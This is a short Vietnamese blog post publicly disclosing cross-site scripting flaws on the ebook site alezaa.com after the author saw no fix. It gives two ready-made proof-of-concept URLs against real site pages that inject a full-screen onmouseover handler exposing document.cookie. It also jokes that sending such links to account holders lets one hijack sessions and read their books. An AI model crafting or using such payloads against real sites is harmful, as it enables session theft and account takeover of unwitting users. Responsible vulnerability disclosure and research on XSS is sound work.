Lỗi bảo mật trên Alezaa.com

Số là được gửi cho cái link ebook trên alezaa.

Đăng kí tài khoản xong vọc thì lòi ra mớ Bug XSS.

Với XSS thì ta có thể dễ dàng chiếm session của người dùng, bằng việc gửi link bug tới ai có tài khoản mà có nhiều book thì tha hồ đọc nhé 😀

Mình đã contact và được phản hồi, tuy nhiên cả tháng rồi và chưa thấy thông báo fix bug nào cả, nên mình public luôn thông tin.

Hầu như link nào của Alezaa cũng đều bị XSS. Lí do đơn giản là ko filter những input đầu vào.

Demo 2 cái link:

https://read.alezaa.com/subscribe.php?back=11112%22%20onmouseover=%22alert(document.cookie)%22%20style=%22width:100vw;%20height:100vh;position:absolute;z-index:%2099999;top:%200px;bottom:%200px;z-index:10000;background:white

https://read.alezaa.com/coins.php?ref=in-app&isbn=%22%20onmouseover=%22alert(document.cookie)%22%20style=%22width:100vw;%20height:100vh;position:absolute;z-index:%2099999;top:%200px;bottom:%200px;z-index:10000;background:white

Hi vọng sẽ fix sớm.